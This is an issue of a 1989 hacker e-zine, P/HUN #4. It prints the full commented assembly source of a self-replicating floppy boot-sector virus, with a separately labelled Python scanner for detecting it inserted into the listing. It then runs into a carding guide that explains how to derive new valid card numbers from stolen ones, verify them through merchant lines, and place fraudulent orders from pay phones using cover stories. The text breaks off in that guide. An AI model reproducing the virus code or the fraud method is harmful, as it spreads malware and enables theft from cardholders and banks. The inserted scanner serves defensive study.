()=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=()

                         P/HUN Issue #4, Volume 2
                         Articles [11]
                         Released: June 27th of 1989.
                         Comments: SummerCon 89'

                 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 = The Toll Center Bulletin Board System =
                 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        ( 2600 Magazine BBS # 5 & P/HUN Magazine Inc. Headquarters)
                             (718)358/9209

                             Presents......

                         -== P/HUN ISSUE IV ==-
                             --------------

P/HUN Issue #4, Volume 2: Phile 1 of 11
---------------------------------------

Introduction:
-------------
Welcome once again to another exciting issue of P/HUN Magazine.
We are a little behind schedule. The delay was caused by a severe disk crash
which wiped out most of the files. The whole issue had to be put back together
again.

This time we have a special segment called P/HUN Telecom News/Advancements,
which contains the latest news in the telecommunications industry as we know
it today. This segment will be released on a regular basis. I would like to
thank DareDevil for taking the first shot at it. We would appreciate some
feedback on this new concept.

If you have any articles to contribute please get in touch with us at our BBS
or at our Usenet address.

Red Knight
Usenet Address: pdave@dasys1.UUCP
SysOp of The Toll Center
Phortune 500/Board of Directors

-------------------------------------------------------------------------------

                            =:Table of Contents:=
                             ------------------

 #   Phile Description                              Author             Size
 --  -------------------------------------------    ------             ------
 1)  Introduction & Table of Contents               Red Knight         2K
 2)  The Banishment of Phrack Inc.                  Knight Lightning   5K
 3)  A Boot Sector Virus                            Southern Cross     21K
 4)  Vital Credit Card Information & Usage          The Sparrow        31K
 5)  An Introduction to House Explosives            Franz Liszt        19K
 6)  TSPS No. 1B - Call Processing & Explanation    Phelix the Hack    34K
 7)  Free Computer Magazines                        Southern Cross     6K
 8)  A Guide to Hacking AMOS                        NightCrawler       21K
 9)  USDN versus ISDN                               Lord Micro         22K
 10) P/HUN Telecom News/Advancements                DareDevil          30K
 11) P/HUN Telecom News/Advancements                DareDevil          24K

-------------------------------------------------------------------------------

P/HUN Issue #4, Volume 2: Phile 2 of 11
---------------------------------------

                        The Banishment Of Phrack Inc.
                        -----------------------------
                             by Knight Lightning

                       June 27, 1989 - August 28, 1989

Hello. This message is being sent to all members of the Phrack Inc. Mailing
List to forewarn you of things to come. Due to certain policies at the
University Of Missouri - Columbia (UMCVMB), Taran King and I will lose our
Bitnet/Internet accounts on June 27, 1989. I would advise not sending files or
mail to either of our addresses after June 26, 1989 just to be safe.

Our "exile" from UMCVMB will last until August 28, 1989 when fall classes
begin. However, this does not mean we are putting Phrack Inc. on hold by any
means.

Solution: Anyone who has files to be placed in Phrack Inc. after June 26, 1989
should contact HATCHET MOLLY. He can be reached at "TK0GRM2@NIU.BITNET" or
"TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU". He will be handling the gathering of
files from you... our network friends.

Phrack Inc. Newsletter Issue 27 will be released within the next TWO WEEKS.
If you would like to receive this issue, please let me know as soon as
possible. The reason I make mention of this is because many people on the
mailing list are not currently accessing their work station for a variety of
reasons (school's out, on vacation, etc). So let us know and we will send it
to you when we release it.

The situation with our Bitnet/Internet addresses will not affect SummerCon '89
in any way. However, any issues of Phrack Inc. that we do release between
June 27, 1989 and August 28, 1989 will *NOT* be sent over the networks to you
until September 1989.
Taran King and I will not have access to the network and will have no
way to send these files until then. So it looks like bulletin boards and
software pirates will get first look during this time period.

So if you have any further questions about this situation, mail us right away.
Remember, any comments or information for Phrack Inc. after June 26, 1989
should be directed to Hatchet Molly.

Knight Lightning                      Taran King
C483307@UMCVMB.BITNET                 C488869@UMCVMB.BITNET
C483307@UMCVMB.MISSOURI.EDU           C488869@UMCVMB.MISSOURI.EDU

Hatchet Molly
TK0GRM2@NIU.BITNET
TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU

                      "The Real Future Is Behind You!"

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

P/HUN Issue #4, Volume 2: Phile 3 of 11
---------------------------------------

                            A BOOT SECTOR VIRUS
                                 5/15/89

The following is a disassembled and commented version of the Alameda College
Boot infector virus. Courtesy of Southern Cross.

;-----------------------------------------------------------------------;
; This virus is of the "FLOPPY ONLY" variety.
; It replicates to the boot sector of a floppy disk and when it gains
; control it will move itself to upper memory. It redirects the keyboard
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time
; it will attempt to infect any floppy it finds in drive A:.
; It keeps the real boot sector at track 39, sector 8, head 0
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
; and should that area be used by a file, the virus
; will die. It also contains no anti detection mechanisms as does the
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1
; sector 9 because this is common to all floppy formats both single
; sided and double sided. It does not contain any malevolent TROJAN
; HORSE code. It does appear to contain a count of how many times it
; has infected other diskettes although this is harmless and the count
; is never accessed.
;
; Things to note about this virus:
; It can not only live through an ALT-CTRL-DEL reboot command, but this
; is its primary (only for that matter) means of reproduction to other
; floppy diskettes. The only way to remove it from an infected system
; is to turn the machine off and reboot an uninfected copy of DOS.
; It is even resident when no floppy is booted but BASIC is loaded
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC,
; it activates and infects the floppy from which the user is
; attempting to boot.
;
; Also note that because of the POP CS command to pass control to
; itself in upper memory, this virus does not work on 80286
; machines (because this is not a valid 80286 instruction).
;
; The Norton Utilities can be used to identify infected diskettes by
; looking at the boot sector and the DOS SYS utility can be used to
; remove it (unlike the Pakistani Brain).
;-----------------------------------------------------------------------;
                                ;
        ORG  7C00H              ;
                                ;
TOS     LABEL WORD              ;TOP OF STACK
;-----------------------------------------------------------------------;
; 1. Find top of memory and copy ourself up there. (keeping same offset)
; 2. Save a copy of the first 32 interrupt vectors to top of memory too
; 3. Redirect int 9 (keyboard) to ourself in top of memory
; 4. Jump to ourself at top of memory
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8
;-----------------------------------------------------------------------;
BEGIN:  CLI                     ;INITIALIZE STACK
        XOR  AX,AX              ;
        MOV  SS,AX              ;
        MOV  SP,offset TOS      ;
        STI                     ;
                                ;
        MOV  BX,0040H           ;ES = TOP OF MEMORY - (7C00H+512)
        MOV  DS,BX              ;
        MOV  AX,[0013H]         ;
        MUL  BX                 ;
        SUB  AX,07E0H           ; (7C00H+512)/16
        MOV  ES,AX              ;
                                ;
        PUSH CS                 ;DS = CS
        POP  DS                 ;
                                ;
        CMP  DI,3456H           ;IF THE VIRUS IS REBOOTING...
        JNE  B_10               ;
        DEC  Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
                                ;
B_10:   MOV  SI,SP  ;SP=7C00    ;COPY SELF TO TOP OF MEMORY
        MOV  DI,SI              ;
        MOV  CX,512             ;
        CLD                     ;
        REP  MOVSB              ;
                                ;
        MOV  SI,CX  ;CX=0       ;SAVE FIRST 32 INT VECTOR ADDRESSES TO
        MOV  DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
        MOV  CX,128             ;
        REP  MOVSB              ;
                                ;
        CALL PUT_NEW_09         ;SAVE/REDIRECT INT 9 (KEYBOARD)
                                ;
        PUSH ES     ;ES=HI      ;JUMP TO OUR HI CODE WITH
        POP  CS                 ; CS = ES
                                ;
        PUSH DS     ;DS=0       ;ES = DS
        POP  ES                 ;
                                ;
        MOV  BX,SP  ;SP=7C00    ;LOAD REAL BOOT SECTOR TO 0000:7C00
        MOV  DX,CX  ;CX=0       ; DRIVE A: HEAD 0
        MOV  CX,2708H           ; TRACK 40, SECTOR 8
        MOV  AX,0201H           ; READ SECTOR
        INT  13H                ; (common to 8/9 sect. 1/2 sided!)
        JB   $                  ; HANG IF ERROR
                                ;
        JMP  JMP_BOOT           ;JMP 0000:7C00
                                ;
;-----------------------------------------------------------------------;
; SAVE THEN REDIRECT INT 9 VECTOR
;
; ON ENTRY: DS = 0
;           ES = WHERE TO SAVE OLD_09 & (HI)
;                WHERE NEW_09 IS (HI)
;-----------------------------------------------------------------------;
PUT_NEW_09:                     ;
        DEC  Word Ptr [0413H]   ;TOP OF MEMORY (0040:0013) -= 1024
                                ;
        MOV  SI,9*4             ;COPY INT 9 VECTOR TO
        MOV  DI,offset OLD_09   ; OLD_09 (IN OUR HI CODE!)
        MOV  CX,0004            ;
                                ;
        CLI                     ;
        REP  MOVSB              ;
        MOV  Word Ptr [9*4],offset NEW_09
        MOV  [(9*4)+2],ES       ;
        STI                     ;
                                ;
        RET                     ;
                                ;
;-----------------------------------------------------------------------;
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR
;-----------------------------------------------------------------------;
ACK_KEYBD:                      ;
        IN   AL,61H             ;RESET KEYBOARD THEN CONTINUE
        MOV  AH,AL              ;
        OR   AL,80H             ;
        OUT  61H,AL             ;
        XCHG AL,AH              ;
        OUT  61H,AL             ;
        JMP  RBOOT              ;
                                ;
;-----------------------------------------------------------------------;
; DATA AREA WHICH IS NOT USED IN THIS VERSION
; REASON UNKNOWN
;-----------------------------------------------------------------------;
TABLE   DB   27H,0,1,2          ;FORMAT INFORMATION FOR TRACK 39
        DB   27H,0,2,2          ; (CURRENTLY NOT USED)
        DB   27H,0,3,2          ;
        DB   27H,0,4,2          ;
        DB   27H,0,5,2          ;
        DB   27H,0,6,2          ;
        DB   27H,0,7,2          ;
        DB   27H,0,8,2          ;
                                ;
;A7C9A  LABEL BYTE              ;
        DW   00024H             ;NOT USED
        DB   0ADH               ;
        DB   07CH               ;
        DB   0A3H               ;
        DW   00026H             ;
                                ;
;L7CA1:                         ;
        POP  CX                 ;NOT USED
        POP  DI                 ;
        POP  SI                 ;
        POP  ES                 ;
        POP  DS                 ;
        POP  AX                 ;
        POPF                    ;
        JMP  1111:1111          ;
                                ;
;-----------------------------------------------------------------------;
; IF ALT & CTRL & DEL THEN ...
; IF ALT & CTRL & ? THEN ...
;-----------------------------------------------------------------------;
NEW_09: PUSHF                   ;
        STI                     ;
                                ;
        PUSH AX                 ;
        PUSH BX                 ;
        PUSH DS                 ;
                                ;
        PUSH CS                 ;DS=CS
        POP  DS                 ;
                                ;
        MOV  BX,[ALT_CTRL]      ;BX=SCAN CODE LAST TIME
        IN   AL,60H             ;GET SCAN CODE
        MOV  AH,AL              ;SAVE IN AH
        AND  AX,887FH           ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
                                ;
        CMP  AL,1DH             ;IS IT A [CTRL]...
        JNE  N09_10             ;...JUMP IF NO
        MOV  BL,AH              ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
        JMP  N09_30             ;
                                ;
N09_10: CMP  AL,38H             ;IS IT AN [ALT]...
        JNE  N09_20             ;...JUMP IF NO
        MOV  BH,AH              ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
        JMP  N09_30             ;
                                ;
N09_20: CMP  BX,0808H           ;IF (CTRL DOWN & ALT DOWN)...
        JNE  N09_30             ;...JUMP IF NO
                                ;
        CMP  AL,17H             ;IF [I]...
        JE   N09_X0             ;...JUMP IF YES
        CMP  AL,53H             ;IF [DEL]...
        JE   ACK_KEYBD          ;...JUMP IF YES
                                ;
N09_30: MOV  [ALT_CTRL],BX      ;SAVE SCAN CODE FOR NEXT TIME
                                ;
N09_90: POP  DS                 ;
        POP  BX                 ;
        POP  AX                 ;
        POPF                    ;
                                ;
        DB   0EAH               ;JMP F000:E987
OLD_09  DW   ?                  ;
        DW   0F000H             ;
                                ;
N09_X0: JMP  N09_X1             ;
                                ;
;-----------------------------------------------------------------------;
;
;-----------------------------------------------------------------------;
RBOOT:  MOV  DX,03D8H           ;DISABLE COLOR VIDEO !?!?
        MOV  AX,0800H           ;AL=0, AH=DELAY ARG
        OUT  DX,AL              ;
        CALL DELAY              ;
        MOV  [ALT_CTRL],AX ;AX=0 ;
                                ;
        MOV  AL,3   ;AH=0       ;SELECT 80x25 COLOR
        INT  10H                ;
        MOV  AH,2               ;SET CURSOR POS 0,0
        XOR  DX,DX              ;
        MOV  BH,DH              ; PAGE 0
        INT  10H                ;
                                ;
        MOV  AH,1               ;SET CURSOR TYPE
        MOV  CX,0607H           ;
        INT  10H                ;
                                ;
        MOV  AX,0420H           ;DELAY (AL=20H FOR EOI BELOW)
        CALL DELAY              ;
                                ;
        CLI                     ;
        OUT  20H,AL             ;SEND EOI TO INT CONTROLLER
                                ;
        MOV  ES,CX  ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
        MOV  DI,CX              ; (REMOVING OUR INT 09 HANDLER!)
        MOV  SI,offset BEGIN - 128 ;
        MOV  CX,128             ;
        CLD                     ;
        REP  MOVSB              ;
                                ;
        MOV  DS,CX  ;CX=0       ;DS=0
                                ;
        MOV  Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
        MOV  [(19H*4)+2],CS     ;
                                ;
        MOV  AX,0040H           ;DS = ROM DATA AREA
        MOV  DS,AX              ;
                                ;
        MOV  [0017H],AH ;AH=0   ;KBFLAG (SHIFT STATES) = 0
        INC  Word Ptr [0013H]   ;MEMORY SIZE += 1024 (WE'RE NOT ACTIVE)
                                ;
        PUSH DS                 ;IF BIOS F000:E502 == 21E4...
        MOV  AX,0F000H          ;
        MOV  DS,AX              ;
        CMP  Word Ptr [0E502H],21E4H ;
        POP  DS                 ;
        JE   R_90               ;
        INT  19H                ; IF NOT...REBOOT
                                ;
R_90:   JMP  0F000:0E502H       ;...DO IT ?!?!?!
                                ;
;-----------------------------------------------------------------------;
; REBOOT INT VECTOR
;-----------------------------------------------------------------------;
NEW_19: XOR  AX,AX              ;
                                ;
        MOV  DS,AX              ;DS=0
        MOV  AX,[0410]          ;AX=EQUIP FLAG
        TEST AL,1               ;IF FLOPPY DRIVES ...
        JNZ  N19_20             ;...JUMP
N19_10: PUSH CS                 ;ELSE ES=CS
        POP  ES                 ;
        CALL PUT_NEW_09         ;SAVE/REDIRECT INT 9 (KEYBOARD)
        INT  18H                ;LOAD BASIC
                                ;
N19_20: MOV  CX,0004            ;RETRY COUNT = 4
                                ;
N19_22: PUSH CX                 ;
        MOV  AH,00              ;RESET DISK
        INT  13                 ;
        JB   N19_81             ;
        MOV  AX,0201            ;READ BOOT SECTOR
        PUSH DS                 ;
        POP  ES                 ;
        MOV  BX,offset BEGIN    ;
        MOV  CX,1               ;TRACK 0, SECTOR 1
        INT  13H                ;
N19_81: POP  CX                 ;
        JNB  N19_90             ;
        LOOP N19_22             ;
        JMP  N19_10             ;IF RETRY EXPIRED...LOAD BASIC
                                ;
;-----------------------------------------------------------------------;
; Reinfection segment.
;-----------------------------------------------------------------------;
N19_90: CMP  DI,3456            ;IF NOT FLAG SET...
        JNZ  RE_INFECT          ;...RE INFECT
                                ;
JMP_BOOT:                       ;PASS CONTROL TO BOOT SECTOR
        JMP  0000:7C00H         ;
                                ;
;-----------------------------------------------------------------------;
; Reinfection Segment.
;-----------------------------------------------------------------------;
RE_INFECT:                      ;
        MOV  SI,offset BEGIN    ;COMPARE BOOT SECTOR JUST LOADED WITH
        MOV  CX,00E6H           ; OURSELF
        MOV  DI,SI              ;
        PUSH CS                 ;
        POP  ES                 ;
        CLD                     ;
        REPE CMPSB              ;
        JE   RI_12              ;IF NOT EQUAL...
                                ;
        INC  Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
                                ;
;MAKE SURE TRACK 39, HEAD 0 FORMATTED
        MOV  BX,offset TABLE    ;FORMAT INFO
        MOV  DX,0000            ;DRIVE A: HEAD 0
        MOV  CH,40-1            ;TRACK 39
        MOV  AH,5               ;FORMAT
        JMP  RI_10              ;REMOVE THE FORMAT OPTION FOR NOW !
                                ;
; <<< NO EXECUTION PATH TO HERE >>>
        JB   RI_80              ;
                                ;
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
RI_10:  MOV  ES,DX              ;ES:BX = 0000:7C00, HEAD=0
        MOV  BX,offset BEGIN    ;TRACK 40H
        MOV  CL,8               ;SECTOR 8
        MOV  AX,0301H           ;WRITE 1 SECTOR
        INT  13H                ;
                                ;
        PUSH CS                 ; (ES=CS FOR PUT_NEW_09 BELOW)
        POP  ES                 ;
        JB   RI_80              ;IF WRITE ERROR...JUMP TO BOOT CODE
                                ;
        MOV  CX,0001            ;WRITE INFECTED BOOT SECTOR !
        MOV  AX,0301            ;
        INT  13H                ;
        JB   RI_80              ; IF ERROR...JUMP TO BOOT CODE
                                ;
RI_12:  MOV  DI,3456H           ;SET "JUST INFECTED ANOTHER ONE"...
        INT  19H                ;...FLAG AND REBOOT
                                ;
RI_80:  CALL PUT_NEW_09         ;SAVE/REDIRECT INT 9 (KEYBOARD)
        DEC  Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDN'T INFECT)
        JMP  JMP_BOOT           ;
                                ;
;-----------------------------------------------------------------------;
;
;-----------------------------------------------------------------------;
N09_X1: MOV  [ALT_CTRL],BX      ;SAVE ALT & CTRL STATUS
                                ;
        MOV  AX,[COUNTER_1]     ;PUT COUNTER_1 INTO RESET FLAG
        MOV  BX,0040H           ;
        MOV  DS,BX              ;
        MOV  [0072H],AX         ; 0040:0072 = RESET FLAG
        JMP  N09_90             ;
                                ;
;-----------------------------------------------------------------------;
; DELAY
;
; ON ENTRY AH:CX = LOOP COUNT
;-----------------------------------------------------------------------;
DELAY:  SUB  CX,CX              ;
D_01:   LOOP $                  ;
        SUB  AH,1               ;
        JNZ  D_01               ;
        RET                     ;
                                ;
;-----------------------------------------------------------------------;
;
;-----------------------------------------------------------------------;
A7DF4     DB   27H,00H,8,2
COUNTER_1 DW   001CH
ALT_CTRL  DW   0
A7DFC     DB   27H,0,8,2

        END
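
Added example (not part of the original phile or its author's code): a defender's scan of a raw 40-track floppy image for the behaviours the commentary calls out, namely the memory-size decrement at 0040:0013, the INT 09h vector rewrite, and the read of track 39, head 0, sector 8 where the real boot sector is kept. The byte patterns are the standard 8086 encodings of those instructions; the function names, the "starts with a JMP" boot-sector heuristic and the sample images are assumptions constructed for the demonstration.

```python
"""Added example: scan a raw 5.25-inch floppy image for the boot-sector
behaviours described in the commented listing. Sample images are constructed."""
import re

SECTOR = 512
TRACKS = 40
# image size -> (heads, sectors per track): 160K, 180K, 320K and 360K diskettes
GEOMETRIES = {TRACKS * h * s * SECTOR: (h, s) for h in (1, 2) for s in (8, 9)}

# Standard 8086 encodings of instructions named in the listing's comments.
INDICATORS = {
    "DEC word [0413h] (shrinks BIOS memory size)":
        re.compile(rb"\xFF\x0E\x13\x04"),
    "MOV [0024h],imm16 / MOV [0026h],ES (rewrites INT 09h vector)":
        re.compile(rb"\xC7\x06\x24\x00..\x8C\x06\x26\x00", re.S),
    "MOV CX,2708h / MOV AX,0201h / INT 13h (reads track 39, sector 8)":
        re.compile(rb"\xB9\x08\x27\xB8\x01\x02\xCD\x13"),
}


def chs_to_lba(cyl, head, sec, heads, spt):
    """Convert a cylinder/head/sector address (sector is 1-based) to an LBA."""
    return (cyl * heads + head) * spt + (sec - 1)


def read_sector(image, lba):
    return image[lba * SECTOR:(lba + 1) * SECTOR]


def looks_like_boot_sector(sector):
    # Heuristic (assumption): DOS boot sectors begin with a short or near JMP.
    return len(sector) == SECTOR and sector[0] in (0xEB, 0xE9)


def scan_image(image):
    """Report which indicators appear in sector 0 and what sits at 39/0/8."""
    if len(image) not in GEOMETRIES:
        raise ValueError("not a 40-track 5.25-inch floppy image")
    heads, spt = GEOMETRIES[len(image)]
    boot = read_sector(image, 0)
    hits = [name for name, pat in INDICATORS.items() if pat.search(boot)]
    stash_lba = chs_to_lba(39, 0, 8, heads, spt)
    return {
        "geometry": (heads, spt),
        "indicators": hits,
        "stash_lba": stash_lba,
        "stash_has_boot_sector": looks_like_boot_sector(read_sector(image, stash_lba)),
        # One hit can be coincidence; two or more is worth a manual look.
        "suspicious": len(hits) >= 2,
    }


def build_sample(infected):
    """Constructed 360K image. The 'infected' variant carries only the three
    short indicator sequences padded with NOPs, not a working program."""
    image = bytearray(TRACKS * 2 * 9 * SECTOR)
    clean_boot = (b"\xEB\x34\x90" + b"CONSTRUCTED").ljust(SECTOR, b"\x00")
    if infected:
        boot = (b"\xFA" + b"\x90" * 16 + b"\xFF\x0E\x13\x04" + b"\x90" * 8
                + b"\xC7\x06\x24\x00\x34\x12\x8C\x06\x26\x00" + b"\x90" * 8
                + b"\xB9\x08\x27\xB8\x01\x02\xCD\x13").ljust(SECTOR, b"\x00")
        image[0:SECTOR] = boot
        lba = chs_to_lba(39, 0, 8, 2, 9)
        image[lba * SECTOR:(lba + 1) * SECTOR] = clean_boot
    else:
        image[0:SECTOR] = clean_boot
    return bytes(image)


if __name__ == "__main__":
    for label, flag in (("clean", False), ("infected", True)):
        report = scan_image(build_sample(flag))
        print(label, report["suspicious"], report["stash_lba"])
        for name in report["indicators"]:
            print("   ", name)
```

A single indicator can occur by coincidence in unrelated boot code, so the scan only flags an image when at least two are present, and the contents of the track 39 sector are reported separately for the analyst.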
End of commented code for the Alameda College Boot Infector Virus.

All viruses are dangerous. I take no responsibility for damages, outbreaks, or
other ramifications caused by misuse. This phile is for educational purposes
only! I expect everyone to use caution and common sense when dealing with
viruses. Enjoy!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

P/HUN Issue #4, Volume 2: Phile 4 of 11
---------------------------------------

                 Vital Credit Card Information and Usage
                                   or
                            Fun with Numbers
                               revision A

                  Compiled, and made intelligible by
                               The Sparrow

** MANY Thanks to Codebreaker; for without him I would be lost. (in JFK?)
   A big thank you to The White Rider for proof-reading this.
   ( If you find any mistakes, BLAME HIM!!! HAHAHA)

   Hello to: Fry Guy ("You've got to hear about this new scam. . .")
             Video Vindicator ("Fly down and let's go casing!")
_____________________________________________________________________________

Completion Date: Tuesday, November Twenty-second, in the year of our Lord, one
                 thousand, nine hundred, eighty eight, 3:39 am.

Last Updated On: Tuesday, March Twenty-second, in the year of our Lord, one
                 thousand, nine hundred, eighty nine, 5:01 am.
______________________________________________________________________________

The following is a list of ideas and facts that have been brought together for
the sole purpose of educating those who lack this knowledge. In writing this,
I do not intend for the reader to use any information contained herein, but
rather to further his/her own education and provoke thought to perhaps better
the society we live in.
______________________________________________________________________________

I. Card Types

The first digit of the credit card number (henceforth referred to as CCN)
determines the credit card type. A simple list might be:

    First Digit of Credit Card      Card Type
    --------------------------      ---------
                3                   American Express
                4                   Visa
                5                   Mastercard
                6                   Discover

II. Bank and Branch Numbers

    Sample Credit Card: 1234 567 890 123
                         ^
                         |

Within the first group of numbers from the left [called Group 4] the Bank name
and branch are contained. We have already discovered that the first digit of
Group 4 reveals the card type. We will now look at how to decipher which bank
issued the card, and which branch of the bank the actual card holder banks at.

Look at the Second, Third, and Fourth digits of Group 4. These three numbers
tell which bank issued the card. A small list follows this paragraph, although
you can compile a list by yourself. Just glance at cards you get your hands on
which the bank name is printed, and record the information.

[ Editor's Note: This is a hard concept to explain, so let me give you an
  example. Let's say Bank of Hicksville's group 4 Visa Credit Card reads 4560.
  (560 = Bank of Hicksville). BUT, 4561 is NOT necessarily Bank of Hicksville,
  too. 4561 could be Bank of Booniesville. So what I am trying to get across
  is that the next bank in line doesn't HAVE to be 4570 -- it could be earlier
  in numbers. ]

    ---------- VISA ----------

    Group 4     Bank Name
    --------    ---------
    4019        Bank of America
    4024        Bank of America
    4052        First Cincinnati
    4060        Navy Federal Credit Union
    4128        Citibank
    4131        State Street Bank
    4215        Marine Midland
    4225        Chase Manhattan
    4231        Chase Lincoln First Classic
    4232        Chase Lincoln First Classic
    4241        Nat. Westminster Bank
    4250        First Chicago Bank
    4271        Citibank Preferred
    4302        H.H.B.C.
    4310        Imperial Savings
    4317        Gold Dome
    4387        Bank One
    4428        Bank of Hoven
    4811        Bank of Hawaii
    4897        Village bank of Cincinnati

    ---------- Mastercards ----------

    Group 4     Bank Name
    ---------   ---------
    5215        Marine Midland
    5217        Manufacturers Hanover Trust
    5233        Huntington Bank
    5242        Chevy Chase Federal Savings
    5254        Bank of America
    5263        Chemical Bank
    5273        Bank of America
    5286        Chase Lincoln First
    5317        Norwest
    5323        Bank of New York
    5329        Maryland Bank NA (MBNA)
    5410        Citibank Preferred
    5411        1st Fin. bank of Omaha
    5414        Nat. Westminster Bank
    5415        Colonial National Bank
    5424        Citibank
    5465        Chase Manhattan
    5678        Marine Midland

III. Bank Codes [ International Bank or Interlink Numbers]

These are used in checking credit. Later on, you will learn that while checking
the credit cards for the amount of credit, you will be prompted to enter the
Bank ID along with the Merchant ID. The bank IDs are, I believe, from the
following list. One note-- you cannot just choose any Bank ID and use it with
any merchant ID. They must correspond in some way. How, I don't know. I THINK
that a bank issues a merchant number to each of their customers. If you try to
use a merchant number with a bank number, and the merchant doesn't actually use
the bank that is specified by the bank number, you are going to get some
problems. (ie, the verification won't go through.) Again, I will state that
this is only a theory.
The reason that I post this theory is to get minds working. So far, no one has
mentioned their ideas on the function of Bank Codes. If you do happen to find
out the true meaning of these numbers, please get in touch with me so I can
update this list. Thanks.

One word- on VISA credit cards, the bank IDs are the first 4 digits of the
Card. For Mastercards, however, they vary. A list follows:

    Bank                            Bank Code
    ----                            ---------
    Chemical Bank                   1263
    Marine Midland                  6207 [1207?]
    Manufacturers Hanover Trust     1033
    Citibank                        1035
    Huntington                      1226
    First Card Gold                 1286
    MBNA                            6017
    Chase Manhattan                 1665
    [ Bank from 5127 ]              1015

IV. "Group 3"

    Sample Credit Card: 1234 5678 9012 3456
                              ^
                              |
                              |

Group 3, or the second group on a credit card in from the left, contains some
VERY useful information about the card. This group holds the information on
the Maximum Expiration Date and the Maximum Credit Limit. (I believe that you
can all see the benefits of this.) This does not mean, however, that the
ACTUAL expiration date and ACTUAL credit limit are in this group. What it
means is this: When the different Credit Card Companies issue Credit Cards to
the consumer, he of course has a credit limit. And when the Companies
formulate credit cards, they create certain groups for certain customers. That
is, certain "groups" contain all the credit cards for people with a credit
limit between $x and $y. The same thing goes with the expiration dates.
Everyone whose card expires after m1/y1 and before m2/y2 has their credit card
in a certain group formulated by the company.

For example: My name is Joe Schmoe. My Visa credit card expires in January of
the year 1999. My credit limit on this card is $7,000. My credit card number
(CCN) will probably be in the same group as my brother-in-law Jack Koff whose
card expires in December of 1998 and whose credit limit is $6,000. BUT, our
cards will be in different groups entirely than my boss' whose card expires in
June of 1995 and whose credit limit is $40,000.

Back to the point of section IV: Let's say you have a credit card with a known
expiration date and known credit limit. Let's also say that you happen upon
ANOTHER credit card whose numbers are the same up until the last 2 groups.
(You and I see that these two cards were issued by the same bank and PROBABLY
have a credit limit in the same ball park and an expiration date not far from
each other. ) BUT, even though you have this new credit card, you lost the
expiration date and credit limit. GOSH! How are you going to use this card
when you don't know this information?? APPROXIMATE! You have a general idea
now, and you can go from there.

One warning here: I have found that small groups of cards with high credit
limits are often hidden in between large groups of cards with very low credit
limits. For instance, let's look at this card: 4123 4567 8901 2345. From -4567
until 4600 in group 3 (from the right) gold cards may exist. But after 4600
and before 4567, cards with credit limits of $500 exist. Kind of sucks, huh??
Just wanted to make you aware of this.

Now, once you learn how to modify these without hurting the card, you have
increased your value as a carder by 100x. But be careful. Often when you
modify a card's group 3 to get a higher credit limit line of cards, you will
find the entire line is dead. Or, in other cases, just the original card you
find is dead, and all surrounding cards are valid with the new credit limits.

V. "Group 2" & "Group 1"

These two groups, or the last two groups on the credit card, are the easiest
to modify. By changing these in such a way, you can formulate new credit cards
simply by doing a little math in your head. These two groups contain the
IDentification codes. Later on in your carding careers, you might find out how
to change these, and thus, you have found the secret to a vault of new and
awaiting credit cards. I stress here that the only purpose that these two
groups serve is to differentiate between customers. If the first two groups of
two cards are the same and the last two groups of two cards are different, the
two cards were issued by the same bank and probably have similar credit
limits, but are of course issued to different people.

VI. Credit Card Verification

Once you have a newly formulated or newly found Credit Card, you must first
check to see if it is valid before you distribute or use it. The reason for
this is this: Although you may not have faltered in your calculations, and you
created a credit card following the correct formula, the card may turn up as
invalid. This is because it has not been issued yet. Visa or Mastercard has
not issued that card to a customer yet. You are ahead of the credit card
company. (Don't you feel important??!) If this case arises, simply formulate a
new credit card from the original valid credit card, and check it once again.
There is no known way around this except to wait.

OKAY- you want to check your credit card and see how much money this person
has. There are many, many credit verifiers around. The easiest way to get
ahold of one is to go into any store which accepts credit cards and look on
the side of the machine that imprints the carbons with the credit card number,
etc. Or, look right on the wall next to the register. There should be a number
to call, a merchant number, and perhaps a bank number. Jot these down and head
on home.

The format for these is usually different, but all have the basic idea in
mind. Call an operator of some sort, tell her the authorization information
that she asks for (bank number, merchant number, etc) and give her the card
and the amount for which to verify the card. She will check and let you know
if it has enough credit left. Simple.

BUT***

******************* ONE NOTE **********************

When you check a card for a certain amount of money, that amount of money is
subtracted from the amount available on the card.
For example, if a card has $5,000 left on it, and you get ahold of it and
check it for $2,000, you can only spend $3,000 before it tells you that you
don't have the necessary credit to go through with a transaction.

VII. Purchasing Merchandise: The Real Story

OKAY, now that you have a VALID credit card, you will most likely want to get
some newly acquired merchandise. This is all fine and dandy, but if you don't
know what you are doing, you can get yourself and most likely your friends in
a LOT of trouble.

---------------------------------------------------------------------------
*** WARNING : NEVER ORDER SOMETHING FROM YOUR HOUSE. ALWAYS GO OUT TO A ***
*** PAY PHONE. ALSO, ALWAYS HAVE A STORY WORKED OUT BEFORE YOU CALL.    ***
*** THAT IS, YOUR NAME, ADDRESS, JOB, PHONE NUMBER, EXCUSE FOR NOT BEING***
*** HOME, MOTHER'S MAIDEN NAME, ETC. ANY STUTTERING OR HESITATION COULD ***
*** BLOW THE WHOLE SHOW !!! !!! !!! !!! !!! !!! !!! !!! !!! !!!         ***
